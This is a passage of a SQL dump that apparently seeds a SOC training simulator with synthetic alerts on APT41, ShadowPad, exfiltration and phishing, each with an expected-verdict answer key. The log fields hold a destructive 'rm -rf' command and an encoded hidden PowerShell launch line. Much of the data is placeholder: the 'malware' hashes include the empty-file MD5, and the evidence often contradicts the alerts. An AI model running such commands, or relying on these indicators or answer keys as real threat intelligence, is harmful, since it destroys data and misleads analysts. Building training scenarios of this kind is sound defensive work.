news.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(485, 'Data Exfiltration Attempt Detected', 'high', 'Network Traffic Analysis', 'Finally, the attackers attempted to exfiltrate sensitive data from the CMS, aiming to use it for further operations or to sell on the dark web.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T19:45:00Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.55\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"sensitive_cms_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"alert_id\":\"EXFIL-2023-001\",\"malicious_url\":\"https://malicious.example.com/upload\",\"detected_by\":\"IDS\",\"description\":\"A data exfiltration attempt was detected by analyzing outgoing traffic from internal IP 192.168.1.105 to external IP 203.0.113.55 using HTTPS protocol.\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal company network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"File hash matches known suspicious file signature.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_cms_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(486, 'Initial Access via Compromised Supplier Network', 'high', 'Third-party network traffic logs', 'APT41 successfully exploited vulnerabilities in the supplier\'s network to gain initial access to the video game developer\'s environment, leveraging compromised credentials and known malware.', 'Supply Chain Compromise', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:47:23Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"supplier_admin\",\"malware_filename\":\"ccleaner_setup.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"login_success\",\"protocol\":\"https\",\"url\":\"https://supplier-compromised.com/update\",\"message\":\"Successful login from external IP using compromised credentials. Known malicious file transferred.\"}', '2026-01-05 03:26:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of video game developer\'s server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"supplier_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CCleaner Supply Chain attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(487, 'Execution of Malicious Code in Build Environment', 'critical', 'Build server activity logs', 'APT41 executed a code injection attack by embedding a ShadowPad backdoor into the game executable during the build process, leveraging access to the build environment.', 'Code Injection', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:35:12Z\",\"build_server\":\"build-server-01\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.50.24\",\"external_ip\":\"203.0.113.45\",\"malicious_file\":\"game_exec_v2.exe\",\"malicious_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"injected_payload\":\"ShadowPad.dll\",\"event_description\":\"Detected execution of a code injection attack involving the ShadowPad backdoor.\"}', '2026-01-05 03:26:48', '2026-02-16 18:19:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the build server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Associated with previous APT41 attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with ShadowPad backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious payload used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(488, 'Establishing Persistence with ShadowPad', 'high', 'Endpoint detection and response (EDR) logs', 'APT41 has installed the ShadowPad backdoor on a compromised system running a vulnerable gaming application. This action establishes a covert channel for persistent access, typical of APT41\'s tactics in targeting the gaming industry.', 'Backdoor Installation', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.25\",\"user\":\"john.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -encodedcommand W3N0YXJ0IC1wYXJhbSB7ZXhwbG9pdC5leGUgfQ==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"ShadowPad.dll\",\"severity\":\"high\",\"description\":\"ShadowPad backdoor installation detected via PowerShell execution on host 10.1.1.25 by user john.doe.\"}', '2026-01-05 03:26:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 external IP used in ShadowPad campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ShadowPad malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File linked to ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(489, 'Lateral Movement Across Player Networks', 'high', 'User authentication logs', 'APT41 has been detected using the ShadowPad backdoor to perform credential dumping for lateral movement across player networks.', 'Credential Dumping', 'T1003.006 - OS Credential Dumping: DCSync', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T13:45:00Z\",\"event_type\":\"authentication_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.101\",\"username\":\"gamer123\",\"auth_method\":\"NTLM\",\"hashed_password\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"shadowpad.dll\",\"process_id\":4567,\"event_description\":\"Credential dumping attempt detected from external IP using NTLM authentication method.\",\"related_hash\":\"f3c6c09f0c3e3c4b1ee2f6f9c5e8f9df\",\"related_ip\":\"10.0.0.15\"}', '2026-01-05 03:26:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP within player network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"gamer123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential credential dumping tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"shadowpad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename linked with ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(490, 'Data Exfiltration and Command Execution', 'critical', 'Network traffic analysis', 'APT41 has successfully exfiltrated sensitive data from the network and executed remote commands using an established backdoor. This action aligns with their known TTPs, causing significant damage to the compromised systems.', 'Data Theft', 'T1041 - Exfiltration Over Command and Control Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":8080,\"dst_port\":443,\"protocol\":\"TCP\",\"username\":\"jdoe\",\"file_exfil\":{\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"command_executed\":\"rm -rf /sensitive_data/*\",\"malware_name\":\"Backdoor.APT41\",\"external_command_control\":\"203.0.113.45\"}', '2026-01-05 03:26:48', '2026-02-16 18:20:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file exfiltrated by attacker.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(491, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting a key personnel in a South Korean defense firm. The email contains a malicious attachment disguised as a procurement request.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.10.5.23\",\"destination_email\":\"j.smith@defensecorp.kr\",\"attachment_name\":\"Procurement_Request_2023.docx\",\"attachment_hash\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"subject\":\"Urgent: Procurement Request\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns targeting defense sectors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.smith@defensecorp.kr\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Email address of a key personnel at the targeted company.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Procurement_Request_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains active macro that downloads additional payloads.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:19.102Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
